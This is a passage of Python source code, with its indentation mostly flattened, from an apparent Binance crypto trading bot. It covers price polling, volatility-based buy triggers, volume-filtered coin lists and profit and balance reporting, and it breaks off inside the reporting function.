global session_profit_incfees_perc, session_profit_incfees_total, session_tpsl_override_msg, is_bot_running, session_USDT_EARNED, last_msg_discord_balance_date, session_USDT_EARNED_TODAY, parsed_creds, TUP,PUP, TDOWN, PDOWN, TNEUTRAL, PNEUTRAL, renewlist, DISABLE_TIMESTAMPS, signalthreads, VOLATILE_VOLUME_LIST, FLAG_PAUSE, coins_up,coins_down,coins_unchanged, SHOW_TABLE_COINS_BOUGHT, USED_BNB_IN_SESSION, PAUSEBOT_MANUAL, sell_specific_coin
global historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins, trade_losses, sell_all_coins, bot_started_datetime
last_price_global = 0
session_profit_incfees_perc = 0
session_profit_incfees_total = 0
session_tpsl_override_msg = ""
session_USDT_EARNED = 0
session_USDT_EARNED_TODAY = 0
last_msg_discord_balance_date = 0
coins_up = 0
coins_down = 0
coins_unchanged = 0
is_bot_running = True
renewlist = 0
FLAG_PAUSE = True
USED_BNB_IN_SESSION = 0
PAUSEBOT_MANUAL = False
sell_specific_coin = False
sell_all_coins = False
try:
historic_profit_incfees_perc
except NameError:
historic_profit_incfees_perc = 0 # or some other default value.
try:
historic_profit_incfees_total
except NameError:
historic_profit_incfees_total = 0 # or some other default value.
try:
trade_wins
except NameError:
trade_wins = 0 # or some other default value.
try:
trade_losses
except NameError:
trade_losses = 0 # or some other default value.
bot_started_datetime = ""
def is_fiat():
# check if we are using a fiat as a base currency
global hsp_head
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
#list below is in the order that Binance displays them, apologies for not using ASC order
fiats = ['USDT', 'BUSD', 'AUD', 'BRL', 'EUR', 'GBP', 'RUB', 'TRY', 'TUSD', 'USDC', 'PAX', 'BIDR', 'DAI', 'IDRT', 'UAH', 'NGN', 'VAI', 'BVND', 'USDP']
if PAIR_WITH in fiats:
return True
else:
return False
def decimals():
# set number of decimals for reporting fractions
if is_fiat():
return 4
else:
return 8
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
renew_list()
try:
for coin in prices:
if CUSTOM_LIST:
# intickers = False
# inex_pairs = False
for item1 in tickers:
if item1 + PAIR_WITH == coin['symbol'] and coin['symbol'].replace(PAIR_WITH, "") not in EX_PAIRS:
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
# intickers = True
# break
# for item2 in EX_PAIRS:
# if item2 + PAIR_WITH == coin['symbol']:
# inex_pairs = True
# break
# if intickers == True and inex_pairs == False:
# initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
# if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in EX_PAIRS): #and all(item not in coin['symbol'] for item in FIATS)
# initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
#print("CUSTOM_LIST", coin['symbol'])
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in EX_PAIRS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
except Exception as e:
write_log(f'{"get_price"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
#except KeyboardInterrupt as ki:
#pass
return initial_price
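# ---------------------------------------------------------------------------
# Illustrative sketch: historical_prices is used as a fixed-size ring buffer of
# RECHECK_INTERVAL snapshots, with hsp_head pointing at the newest one, so the
# buffer always spans roughly TIME_DIFFERENCE minutes. The wrap-around above
# (increment, reset at RECHECK_INTERVAL) is equivalent to this stripped-down
# modulo version:
def _demo_price_ring_buffer(recheck_interval=6, snapshots=15):
    buffer = [None] * recheck_interval
    head = -1
    for snapshot in range(snapshots):   # pretend each number is a price snapshot
        head = (head + 1) % recheck_interval
        buffer[head] = snapshot
    return head, buffer                 # head indexes the newest snapshot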
#use function of the OlorinSledge
def wait_for_price():
try:
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff, coins_up,coins_down,coins_unchanged
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
# get first element from the dictionary
firstcoin = next(iter(historical_prices[hsp_head]))
#BBif historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
if historical_prices[hsp_head][firstcoin]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
#BBtime.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head][firstcoin]['time'])).total_seconds())
# retrieve latest prices
renew_list()
last_price = get_price()
# Moved to the end of this method
# balance_report(last_price)
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin that has gained more than CHANGE_IN_PRICE is added to the volatile_coins dict, as long as the TRADE_SLOTS limit has not been reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# volatility_cooloff[coin] = datetime.now() - timedelta(minutes=COOLOFF_PERIOD)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
#if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < TRADE_SLOTS or TRADE_SLOTS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, purchasing ${TRADE_TOTAL} {PAIR_WITH} of {coin}!')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
#if len(coins_bought) == TRADE_SLOTS:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but failed cool off period of {COOLOFF_PERIOD} minutes! Curr COP is {volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD)}{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = buy_external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + len(volatile_coins)) < TRADE_SLOTS:
#(len(coins_bought) + exnumber + len(volatile_coins)) < TRADE_SLOTS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}External signal received on {excoin}, purchasing ${TRADE_TOTAL} {PAIR_WITH} value of {excoin}!')
with open(EXTERNAL_COINS,'a+') as f:
f.write(excoin + '\n')
balance_report(last_price)
except Exception as e:
write_log(f'{"wait_for_price"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
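# ---------------------------------------------------------------------------
# Illustrative worked example of the threshold_check computed above: the sign
# encodes direction (negative when the high came before the low, i.e. the coin
# fell over the window) and the magnitude is the min-to-max move in percent.
def _demo_threshold_check(min_price=100.0, max_price=103.0, rising=True):
    sign = 1.0 if rising else -1.0      # rising: the low is older than the high
    return sign * (max_price - min_price) / min_price * 100   # 3.0 for the defaults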
def get_volume_list():
try:
global COINS_MAX_VOLUME, COINS_MIN_VOLUME
VOLATILE_VOLUME = "volatile_volume_" + str(date.today()) + ".txt"
most_volume_coins = {}
tickers_all = []
# os.remove(VOLATILE_VOLUME)
#try:
#if os.path.exists("tickers_all.txt") == True:
#tickers_all=[line.strip() for line in open("tickers_all.txt")]
#else:
#VOLATILE_VOLUME = ""
prices = client.get_all_tickers()
for coin in prices:
if coin['symbol'] == coin['symbol'].replace(PAIR_WITH, "") + PAIR_WITH:
tickers_all.append(coin['symbol'].replace(PAIR_WITH, ""))
c = 0
if os.path.exists(VOLATILE_VOLUME) == False:
load_settings()
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Creating volatile list, wait a moment...')
if COINS_MAX_VOLUME.isnumeric() == False and COINS_MIN_VOLUME.isnumeric() == False:
infocoinMax = client.get_ticker(symbol=COINS_MAX_VOLUME + PAIR_WITH)
infocoinMin = client.get_ticker(symbol=COINS_MIN_VOLUME + PAIR_WITH)
COINS_MAX_VOLUME = math.ceil(float(infocoinMax['quoteVolume']))
COINS_MIN_VOLUME = round(float(infocoinMin['quoteVolume']))
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}COINS_MAX_VOLUME {COINS_MAX_VOLUME} and COINS_MIN_VOLUME {COINS_MIN_VOLUME} were set from specific currencies...')
for coin in tickers_all:
#try:
infocoin = client.get_ticker(symbol= coin + PAIR_WITH)
volumecoin = float(infocoin['quoteVolume']) #/ 1000000
if volumecoin <= COINS_MAX_VOLUME and volumecoin >= COINS_MIN_VOLUME and coin not in EX_PAIRS and coin not in most_volume_coins:
most_volume_coins.update({coin : volumecoin})
c = c + 1
# except Exception as e:
# print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
# continue
if c <= 0:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Cannot continue because there are no coins in the selected range, change the settings and start the bot again...')
sys.exit()
sortedVolumeList = sorted(most_volume_coins.items(), key=lambda x: x[1], reverse=True)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Saving {str(c)} coins to {VOLATILE_VOLUME} ...')
for coin in sortedVolumeList:
with open(VOLATILE_VOLUME,'a+') as f:
f.write(coin[0] + '\n')
else:
if ALWAYS_OVERWRITE == False:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}There is already a recently created list, if you want to create a new list, stop the bot and delete the previous one.')
print(f'{txcolors.WARNING}REMEMBER: {txcolors.DEFAULT}if you create a new list when continuing a previous session, it may not coincide with the previous one and give errors...')
except Exception as e:
write_log(f'{"get_volume_list"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
write_log("COIN_ERROR: ", coin + PAIR_WITH)
exit(1)
return VOLATILE_VOLUME
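# ---------------------------------------------------------------------------
# Illustrative sketch of the core of get_volume_list(): keep only the pairs
# whose 24h quote volume lies inside [min_volume, max_volume], sorted from the
# most traded down. get_ticker_volume is a stand-in for the client.get_ticker()
# lookup used above.
def _demo_filter_by_volume(tickers, get_ticker_volume, min_volume, max_volume):
    kept = {}
    for coin in tickers:
        volume = float(get_ticker_volume(coin))
        if min_volume <= volume <= max_volume:
            kept[coin] = volume
    return sorted(kept.items(), key=lambda kv: kv[1], reverse=True)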
def print_table_coins_bought():
try:
if SHOW_TABLE_COINS_BOUGHT:
if len(coins_bought) > 0:
my_table = PrettyTable()
my_table.format = True
my_table.border = True
my_table.align = "c"
my_table.valign = "m"
my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change %", "Profit $", "Time Held"]
last_price = get_price(False)
for coin in list(coins_bought):
LastPriceT = round(float(last_price[coin]['price']),3)
sellFeeT = (LastPriceT * (TRADING_FEE/100))
LastPriceLessFeesT = round((LastPriceT - sellFeeT), 2)
BuyPriceT = round(float(coins_bought[coin]['bought_at']),3)
buyFeeT = (BuyPriceT * (TRADING_FEE/100))
BuyPricePlusFeesT = BuyPriceT + buyFeeT
#ProfitAfterFees = round((LastPriceLessFees - BuyPricePlusFees), 2)
#PriceChangeIncFees_Perc = round(float(((LastPriceLessFees - BuyPricePlusFees) / BuyPricePlusFees) * 100), 3)
PriceChangeIncFees_PercT = round(float(((LastPriceT - BuyPricePlusFeesT) / BuyPricePlusFeesT) * 100), 3)
PriceChange_PercT = round(float(((LastPriceT - BuyPriceT) / BuyPriceT) * 100), 3)
#if PriceChangeIncFees_Perc == -100: PriceChangeIncFees_Perc = 0
time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
#if IGNORE_FEE:
#my_table.add_row([f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coin.replace(PAIR_WITH,'')}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['volume']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['take_profit']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{coins_bought[coin]['stop_loss']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{PriceChangeIncFees_Perc:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.RED}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.add_row([f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coin.replace(PAIR_WITH,'')}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['volume']:.5f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{BuyPriceT:.3f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{LastPriceT:.3f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['take_profit']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{coins_bought[coin]['stop_loss']:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{PriceChangeIncFees_PercT:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_PercT)/100:.2f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if PriceChangeIncFees_PercT >= 0. else txcolors.RED}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.sortby = SORT_TABLE_BY
my_table.reversesort = REVERSE_SORT
print(my_table)
print("\n")
except Exception as e:
write_log(f'{"print_table_coins_bought"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def balance_report(last_price):
try:
global trade_wins, trade_losses, session_profit_incfees_perc, session_profit_incfees_total, last_price_global, session_USDT_EARNED_TODAY, session_USDT_EARNED, TUP, TDOWN, TNEUTRAL
unrealised_session_profit_incfees_perc = 0
unrealised_session_profit_incfees_total = 0
msg1 = ""
msg2 = ""
BUDGET = TRADE_SLOTS * TRADE_TOTAL
exposure_calculated = 0
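# walk every held coin to accumulate current exposure and the unrealised profit/loss including trading fees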
for coin in list(coins_bought):
LastPriceBR = float(last_price[coin]['price'])
sellFeeBR = (LastPriceBR * (TRADING_FEE/100))
BuyPriceBR = float(coins_bought[coin]['bought_at'])
buyFeeBR = (BuyPriceBR * (TRADING_FEE/100))
exposure_calculated = exposure_calculated + round(float(coins_bought[coin]['bought_at']) * float(coins_bought[coin]['volume']),0)
#PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_TotalBR = float(((LastPriceBR-sellFeeBR) - (BuyPriceBR+buyFeeBR)) * coins_bought[coin]['volume'])
# unrealised_session_profit_incfees_perc = float(unrealised_session_profit_incfees_perc + PriceChangeIncFees_Perc)
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_TotalBR)
unrealised_session_profit_incfees_perc = (unrealised_session_profit_incfees_total / BUDGET) * 100
DECIMALS = int(decimals())
# CURRENT_EXPOSURE = round((TRADE_TOTAL * len(coins_bought)), DECIMALS)
CURRENT_EXPOSURE = round(exposure_calculated, 0)
INVESTMENT_TOTAL = round((TRADE_TOTAL * TRADE_SLOTS), DECIMALS)
# truncating some of the above values to the correct decimal places before printing
WIN_LOSS_PERCENT = 0
if (trade_wins > 0) and (trade_losses > 0):
WIN_LOSS_PERCENT = round((trade_wins / (trade_wins+trade_losses)) * 100, 2)
if (trade_wins > 0) and (trade_losses == 0):
WIN_LOSS_PERCENT = 100
strplus = "+"
if STATIC_MAIN_INFO == True: clear()
if SCREEN_MODE < 2: print(f'')
if SCREEN_MODE == 2: print(f'')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}STARTED : {txcolors.SELL_LOSS}{str(bot_started_datetime).split(".")[0]}{txcolors.DEFAULT} | Running for: {txcolors.SELL_LOSS}{str(datetime.now() - bot_started_datetime).split(".")[0]} {txcolors.BORDER}{"+".rjust(15)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}STARTED: {txcolors.SELL_LOSS}{str(bot_started_datetime).split(".")[0]}{txcolors.DEFAULT} | Running for: {txcolors.SELL_LOSS}{str(datetime.now() - bot_started_datetime).split(".")[0]}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}CURRENT HOLDS : {txcolors.SELL_LOSS}{str(len(coins_bought)).zfill(4)}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{str(TRADE_SLOTS).zfill(4)} {"{0:>5}".format(int(CURRENT_EXPOSURE))}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{"{0:<5}".format(int(INVESTMENT_TOTAL))} {txcolors.DEFAULT}{PAIR_WITH}{txcolors.BORDER}{"+".rjust(32)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}CURRENT HOLDS: {txcolors.SELL_LOSS}{str(len(coins_bought))}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{str(TRADE_SLOTS)} {int(CURRENT_EXPOSURE)}{txcolors.DEFAULT}/{txcolors.SELL_LOSS}{int(INVESTMENT_TOTAL)} {txcolors.DEFAULT}{PAIR_WITH}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BUYING PAUSE : {txcolors.SELL_LOSS}{"{0:<5}".format(str(bot_paused))}{txcolors.BORDER}{"+".rjust(53)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BUYING PAUSE: {txcolors.SELL_LOSS}{str(bot_paused)}{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}WINS / LOSSES : {txcolors.BOT_WINS}{str(trade_wins).zfill(5).ljust(5)}{txcolors.DEFAULT}/{txcolors.BOT_LOSSES}{str(trade_losses).zfill(5).ljust(5)} {txcolors.DEFAULT}Win%: {txcolors.SELL_LOSS}{str(int(float(WIN_LOSS_PERCENT))).zfill(3)}%{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}WINS/LOSSES: {txcolors.BOT_WINS}{str(trade_wins)}{txcolors.DEFAULT}/{txcolors.BOT_LOSSES}{str(trade_losses)} {txcolors.DEFAULT}Win%: {txcolors.SELL_PROFIT if WIN_LOSS_PERCENT > 0. else txcolors.BOT_LOSSES}{float(WIN_LOSS_PERCENT):g}%{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}PENDING : {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{str(round(unrealised_session_profit_incfees_perc,3)).center(8)}% Est:${str(round(unrealised_session_profit_incfees_total,3)).center(8)} {PAIR_WITH.center(6)}{txcolors.DEFAULT}{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}PENDING: {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{str(round(unrealised_session_profit_incfees_perc,3))}% Est:${str(round(unrealised_session_profit_incfees_total,3))} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}COIN STATUS : {txcolors.SELL_PROFIT}Up {coins_up}, {txcolors.SELL_LOSS}Down: {coins_down}{txcolors.DEFAULT}, Unchanged: {coins_unchanged}{txcolors.BORDER}{"+".rjust(35)}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}COIN STATUS: {txcolors.SELL_PROFIT}Up {coins_up}, {txcolors.SELL_LOSS}Down: {coins_down}{txcolors.DEFAULT}, Unchanged: {coins_unchanged}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}TOTAL : {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,3)).center(8)}% Est:${str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,3)).center(8)} {PAIR_WITH.center(6)}{txcolors.DEFAULT}{txcolors.BORDER}{"+".rjust(36)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}TOTAL: {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,3))}% Est:${str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,3))} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BNB USED : {txcolors.SELL_PROFIT} {"{0:>5}".format(str(format(float(USED_BNB_IN_SESSION), ".8f")))} {txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BNB USED: {txcolors.SELL_PROFIT}{str(format(float(USED_BNB_IN_SESSION), ".6f"))} {txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}EARNED : {txcolors.SELL_PROFIT if session_USDT_EARNED > 0. else txcolors.BOT_LOSSES}{"{0:>5}".format(str(format(float(session_USDT_EARNED), ".14f")))} {txcolors.DEFAULT}{PAIR_WITH.center(6)} | {txcolors.SELL_PROFIT if (session_USDT_EARNED * 100)/INVESTMENT_TOTAL > 0. else txcolors.BOT_LOSSES}{round((session_USDT_EARNED * 100)/INVESTMENT_TOTAL, 3)}%{txcolors.BORDER}{"+".rjust(33)}{txcolors.DEFAULT}')
if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}EARNED: {txcolors.SELL_PROFIT if session_USDT_EARNED > 0. else txcolors.BOT_LOSSES}{str(format(float(session_USDT_EARNED), ".14f"))} {txcolors.DEFAULT}{PAIR_WITH} | Profit%: {txcolors.SELL_PROFIT if (session_USDT_EARNED * 100)/INVESTMENT_TOTAL > 0. else txcolors.BOT_LOSSES}{round((session_USDT_EARNED * 100)/INVESTMENT_TOTAL,3)}%{txcolors.DEFAULT}')
if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+{txcolors.DEFAULT}BOT PROFIT : {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est: ${historic_profit_incfees_total:.4f} {PAIR_WITH.center(6)}{txcolors.BORDER}{"+".rjust(35)}{txcolors.DEFAULT}')
#if SCREEN_MODE == 2: print(f'{txcolors.DEFAULT}BOT PROFIT: {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est: ${historic_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
#if SCREEN_MODE < 2: print(f'{txcolors.BORDER}+---------------------------------------------------------------------------+{txcolors.DEFAULT}')
print(f'')
print_table_coins_bought()
#improving reporting messages
msg1 = str(datetime.now()) + "\n"
msg2 = " STARTED : " + str(bot_started_datetime) + "\n"
msg2 = msg2 + " RUNNING FOR : " + str(datetime.now() - bot_started_datetime) + "\n"
msg2 = msg2 + " TEST_MODE : " + str(TEST_MODE) + "\n"
msg2 = msg2 + " CURRENT HOLDS : " + str(len(coins_bought)/TRADE_SLOTS) + "(" + str(float(CURRENT_EXPOSURE)/float(INVESTMENT_TOTAL)) + PAIR_WITH + ")" + "\n"
msg2 = msg2 + " WIN : " + str(trade_wins) + "\n"
msg2 = msg2 + " LOST : " + str(trade_losses) + "\n"
msg2 = msg2 + " BUYING PAUSED : " + str(bot_paused) + "\n"
msg2 = msg2 + PAIR_WITH + " EARNED : " + str(session_USDT_EARNED) + "\n"
if (datetime.now() - bot_started_datetime) > timedelta(1):
session_USDT_EARNED_TODAY = session_USDT_EARNED_TODAY + session_USDT_EARNED
msg2 = msg2 + PAIR_WITH + " EARNED TODAY: " + str(session_USDT_EARNED_TODAY)
session_USDT_EARNED_TODAY = 0
#msg1 = str(datetime.now())
#msg2 = " | " + str(len(coins_bought)) + "/" + str(TRADE_SLOTS) + " | PBOT: " + str(bot_paused)
#msg2 = msg2 + ' SPR%: ' + str(round(session_profit_incfees_perc,2)) + ' SPR$: ' + str(round(session_profit_incfees_total,4))
#msg2 = msg2 + ' SPU%: ' + str(round(unrealised_session_profit_incfees_perc,2)) + ' SPU$: ' + str(round(unrealised_session_profit_incfees_total,4))
#msg2 = msg2 + ' SPT%: ' + str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,2)) + ' SPT$: ' + str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,4))
#msg2 = msg2 + ' ATP%: ' + str(round(historic_profit_incfees_perc,2)) + ' ATP$: ' + str(round(historic_profit_incfees_total,4))
